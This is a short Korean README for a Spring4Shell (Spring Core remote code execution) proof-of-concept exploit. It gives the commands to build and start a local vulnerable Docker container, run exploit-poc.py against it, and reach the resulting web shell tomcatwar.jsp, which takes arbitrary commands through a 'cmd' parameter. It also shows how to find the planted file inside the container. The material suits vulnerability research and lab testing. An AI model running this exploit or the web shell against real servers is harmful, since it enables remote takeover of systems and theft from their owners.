
또 다른 spring4shell (Spring core RCE) POC
이 취약점은 Spring Core에 영향을 미치며, 공격자가 특수하게 조작된 HTTP 요청을 보내 라이브러리의 HTTP 요청 파서 보호 기능을 우회하여 원격 코드 실행을 유발할 수 있습니다.
자세한 정보는 여기를 참조하세요.

이 취약점을 악용하려면 여러 조건이 충족되어야 합니다.
docker build . -t springshell-rce-poc
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
python exploit-poc.py --url "http://127.0.0.1:8081/"
예상 응답
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami
이 URL에 접속하면 원하는 명령어를 cmd=<whatyouwant>에 넣어 실행할 수 있습니다.

컨테이너에 SSH로 접속하면 tomcatwar.jsp라는 새 파일이 생성된 것을 확인할 수 있습니다.
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT